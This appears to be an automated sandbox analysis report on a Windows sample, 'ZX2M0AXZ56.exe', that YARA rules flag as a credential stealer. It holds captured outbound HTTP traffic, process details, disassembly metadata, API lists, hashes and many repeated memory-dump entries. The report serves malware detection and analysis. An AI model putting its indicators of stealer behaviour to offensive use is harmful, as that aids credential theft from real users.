2024-12-26 11:46:22 UTC	5040	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-26 11:46:42 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:46:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6ehqe77iebhasnuvrv8oc8hq7n; expires=Mon, 21 Apr 2025 05:33:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oM%2FvsGmdGn9aZgrUa%2FxUh3NZLpj1CTMm9ZaIE8oQIQakIrrY1JYHrvXfIgA9DafX81%2BdSKZ0Xso1Uj2YKlzZdSlh74XRj5ZefKqAupj95Fy0UG5nN5x9o%2F%2F52K8EaWNNs4w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80d4794baf4288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1730&rtt_var=669&sent=21&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21326&delivery_rate=1610590&cwnd=245&unsent_bytes=0&cid=c68546f53b0409ff&ts=20413&x=0"
2024-12-26 11:46:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:46:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	5
Start time:	06:45:12
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\ZX2M0AXZ56.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZX2M0AXZ56.exe"
Imagebase:	0x4b0000
File size:	2'964'992 bytes
MD5 hash:	E295C4C73781AE57171084AA84070765
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2171437593.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1944581923.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2167082560.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2170689268.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1945137518.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	70.5%
Total number of Nodes:	224
Total number of Limit Nodes:	23

Executed Functions

Function 004C57C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON

Download Yara Rule

Strings

3F&D, xrefs: 004C6273
_^]\, xrefs: 004C5B14
w}MI, xrefs: 004C6128
~mfQ, xrefs: 004C613E
*,-", xrefs: 004C66EF
S\], xrefs: 004C59EE
pt}w, xrefs: 004C61F2
t~v:, xrefs: 004C61E7
uqrs, xrefs: 004C6AF0
WQ, xrefs: 004C59E3
L4, xrefs: 004C6780
qRb`, xrefs: 004C6133
L4, xrefs: 004C6BA0
ntxE, xrefs: 004C6112
{zdy, xrefs: 004C611D

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
API String ID: 0-510280711
Opcode ID: 59895079e7bc6bd38fccc57970cf513352ee6eb9d059b062de5c9742ee4213ce
Instruction ID: 7ae493c22668dc7c83ad0e8142cb9ab2e39a83ef3327a0073fa804b58730e93e
Opcode Fuzzy Hash: 59895079e7bc6bd38fccc57970cf513352ee6eb9d059b062de5c9742ee4213ce
Instruction Fuzzy Hash: 52C215B56083408FD7248F28D891BABB7E2FF95314F19893DE4C987392D7399811CB5A

Function 004D1D00 Relevance: 26.8, Strings: 21, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z, xrefs: 004D20DB
,, xrefs: 004D21D9
g, xrefs: 004D20CC
d, xrefs: 004D20D6
s, xrefs: 004D2284
\, xrefs: 004D2150
], xrefs: 004D214B
?, xrefs: 004D1F02
_, xrefs: 004D1DA4
], xrefs: 004D1DAE
^, xrefs: 004D23B8
\, xrefs: 004D1DB3
], xrefs: 004D23BD
9, xrefs: 004D1F0C
^, xrefs: 004D2146
8, xrefs: 004D1F07
_, xrefs: 004D23B3
!@, xrefs: 004D1D36
^, xrefs: 004D1DA9
\, xrefs: 004D23C2
_, xrefs: 004D2141

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
API String ID: 0-1565257739
Opcode ID: 99d4e5286a11582b8e36299fa67380b059a3db8e91883c0b15a05063041609da
Instruction ID: 9eb9235d7e6c583b13ae0cd92e266dd3e42b3cd3dca5c289964ddd3913c8ab4e
Opcode Fuzzy Hash: 99d4e5286a11582b8e36299fa67380b059a3db8e91883c0b15a05063041609da
Instruction Fuzzy Hash: 9C22BE7150C7808FD3248F28C5A136FBBE1AB96314F14496FE9D987392D7B98846CB4B

Function 004E9280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00001F7A), ref: 004E9551
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004E958E
SysFreeString.OLEAUT32 ref: 004E98DF
SysFreeString.OLEAUT32(?), ref: 004E98E5
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 004E992E

Strings

t"j, xrefs: 004E966E
SB, xrefs: 004E979E
b{tu, xrefs: 004E92D9, 004E939B
Jtuj, xrefs: 004E92E5
=hn, xrefs: 004E9676
O^, xrefs: 004E97A6
gd, xrefs: 004E968E
:;$%, xrefs: 004E99C0

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
API String ID: 1773362589-1335595022
Opcode ID: 29ca728e83f07e4a7e4d1f42d44c2994fb7de07a5d7383bd1e8b0bdab6ea80d9
Instruction ID: a3702ca3babc57fe9b42ed13fbb4072c1a71bebf6e1f9635f7efbfdcd9aa83dc
Opcode Fuzzy Hash: 29ca728e83f07e4a7e4d1f42d44c2994fb7de07a5d7383bd1e8b0bdab6ea80d9
Instruction Fuzzy Hash: 92221276A183419BD310CF29C880B5BBBE2EFC5314F28892DE5D49B3A1D779D845CB86

Function 004C1227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 004C1846
), xrefs: 004C1A4D
@, xrefs: 004C17D0
F, xrefs: 004C184E
`, xrefs: 004C13A4
+, xrefs: 004C17CB
[, xrefs: 004C1555
>, xrefs: 004C16FF

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
